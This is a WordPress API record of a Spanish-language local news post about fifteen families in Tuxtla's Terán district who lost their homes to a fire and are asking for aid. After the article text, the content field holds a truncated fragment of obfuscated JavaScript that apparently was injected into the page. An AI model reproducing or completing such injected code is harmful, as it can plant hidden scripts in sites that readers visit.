{"id":8790,"date":"2023-02-23T03:44:55","date_gmt":"2023-02-23T03:44:55","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=8790"},"modified":"2023-02-23T03:44:56","modified_gmt":"2023-02-23T03:44:56","slug":"damnificados-por-incendio-piden-apoyo","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=8790","title":{"rendered":"Damnificados por incendio piden apoyo"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"405\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/02\/FB_IMG_1677123740822.jpg\" alt=\"\" class=\"wp-image-8791\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/02\/FB_IMG_1677123740822.jpg 720w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/02\/FB_IMG_1677123740822-300x169.jpg 300w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<p>Rodolfo Flores.15 familias que resultaron damnificadas por un incendio ocurrido en la delegaci\u00f3n Ter\u00e1n piden ayuda a la poblaci\u00f3n, puesto que perdieron todas sus pertenencias y sus humildes viviendas localizadas en el Tercer Callej\u00f3n El Refugio.El incendio afecto a ocho viviendas, el siniestro fue ocasionado por un sujeto en estado inconveniente, que prendi\u00f3 fuego a una casa pero las llamas se extendieron al resto.En uno de los casos, Ismael reconoci\u00f3 que, a pesar de ser una zona de alto riesgo dictaminada como no apta para vivir, los propietarios son personas de muy bajos recursos que no tienen un espacio donde vivir.&#8221;Ac\u00e1 nosotros, nos dedicamos a recolectar chatarra, fierro viejo, cart\u00f3n, pl\u00e1stico y otras cosas para sobrevivir, no tenemos casa, no tenemos a donde ir&#8221;, expres\u00f3.Las viviendas eran en su mayor\u00eda de cart\u00f3n, madera y pl\u00e1stico, por ello la perdida fue total.Los afectados hacen un llamado a las autoridades y a la sociedad tender la mano en estos momentos que requieren de alimentos, v\u00edveres y otros art\u00edculos.Por su parte, Eder Fabi\u00e1n Mancilla Vel\u00e1zquez, secretario municipal de Protecci\u00f3n Civil de Tuxtla inform\u00f3 que, se ha levantado un censo para tener certeza de las familias afectadas y brindar apoyo en la medida de las posibilidades.Record\u00f3 que, desde hace dos a\u00f1os se hab\u00eda notificado a los habitantes de este punto de la ciudad que no pod\u00edan habitar por tratarse de una zona de alto riesgo.&#8221;Se les est\u00e1 brindando el apoyo, lo que est\u00e9 en nuestras posibilidades, pero la realidad es que, en esta zona no pueden habitarla&#8221;, expres\u00f3.Las autoridades, indicaron que, a estas familias no se les permitir\u00e1 regresar a este lugar, incluso, las otras viviendas que est\u00e1n en el margen del Sabinal, ser\u00e1n desalojadas para evitar cualquier tipo de riesgo. Los afectados estar\u00e1n pernoctando de manera moment\u00e1nea en el Domo del parque de la Colonia San Jos\u00e9 Ter\u00e1n.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Rodolfo Flores.15 familias que resultaron damnificadas por un incendio ocurrido en la delegaci\u00f3n Ter\u00e1n piden ayuda a la poblaci\u00f3n, puesto que perdieron todas sus pertenencias y sus humildes viviendas localizadas en el Tercer Callej\u00f3n El Refugio.El incendio afecto a ocho viviendas, el siniestro fue ocasionado por un sujeto en estado inconveniente, que prendi\u00f3 fuego a &hellip;<\/p>\n","protected":false},"author":2,"featured_media":8791,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-8790","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8790","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=8790"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8790\/revisions"}],"predecessor-version":[{"id":8792,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8790\/revisions\/8792"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/8791"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=8790"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=8790"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=8790"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}